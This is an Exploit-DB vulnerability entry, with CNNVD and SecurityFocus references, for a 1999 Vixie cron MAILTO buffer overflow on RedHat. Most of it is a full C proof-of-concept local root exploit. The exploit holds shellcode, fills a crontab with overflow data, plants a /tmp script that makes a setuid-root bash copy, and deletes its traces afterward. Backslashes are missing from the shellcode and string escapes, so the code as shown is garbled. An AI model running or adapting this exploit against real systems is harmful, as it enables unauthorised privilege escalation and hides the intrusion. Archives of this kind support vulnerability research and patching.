https://www.exploit-db.com/exploits/19470
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-050

基于RedHat系统的VixieCron存在缓冲区溢出漏洞。可以借助MAILTO环境变量导致该漏洞。

source: http://www.securityfocus.com/bid/602/info
 
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. 

/*
 * VixieCron 3.0 Proof of Concept Exploit - w00w00
 * 
 * Not only does Paul give up root with this one, but with his creative use of
 * strtok() he actually ends up putting the address of our shellcode in eip.  
 * 
 * Many Thanks: Cheez Wiz, Sangfroid
 * Thanks: stran9er, Shok
 * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
 * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web 
 *        defacement group here>
 *        
 * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
 * 
 * [email protected]
 * 
 */
   
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

char shellcode[] =
        "xebx40x5ex89x76x0cx31xc0x89x46x0bx89xf3xeb"
        "x27w00w00:Ifwewerehackerswedownyourdumbassx8dx4e"
        "x0cx31xd2x89x56x16xb0x0bxcdx80xe8xbbxffxff"
        "xff/tmp/w00w00";
        
int     
main(int argc,char *argv[])

        FILE *cfile,*tmpfile;
        struct stat sbuf;
        struct passwd *pw;
        int x;
        
        pw = getpwuid(getuid());
        
        chdir(pw->pw_dir);
        cfile = fopen("./cronny","a+");
        tmpfile = fopen("/tmp/w00w00","a+");
        
        fprintf(cfile,"MAILTO=");
        for(x=0;x<96;x++)
                fprintf(cfile,"w00w00 ");
        fprintf(cfile,"%s",shellcode);
        fprintf(cfile,"n* * * * * daten");
        fflush(cfile);

        fprintf(tmpfile,"#!/bin/shncp /bin/bash %snchmod 4755 %s/bashn", pw->pw_dir,pw->pw_dir);
        fflush(tmpfile);
          
        fclose(cfile),fclose(tmpfile);
   
        chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
   
        if(!(fork())) {
                execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
        } else {  
                printf("Waiting for shell be patient....n");
                for(;;) {
                        if(!(stat("./bash",&sbuf))) {
                                        break;
                        } else { sleep(5); }
                } 
                if((fork())) {
                        printf("Thank you for using w00warez!n");
                        execl("./bash","bash",(char *)0);
                } else {  
                        remove("/tmp/w00w00");
                        sleep(5);
                        remove("./bash");
                        remove("./cronny");
                        execl("/usr/bin/crontab","crontab","-r",(char *)0);
                }
        }
}

来源:BID
名称:602
链接:http://www.securityfocus.com/bid/602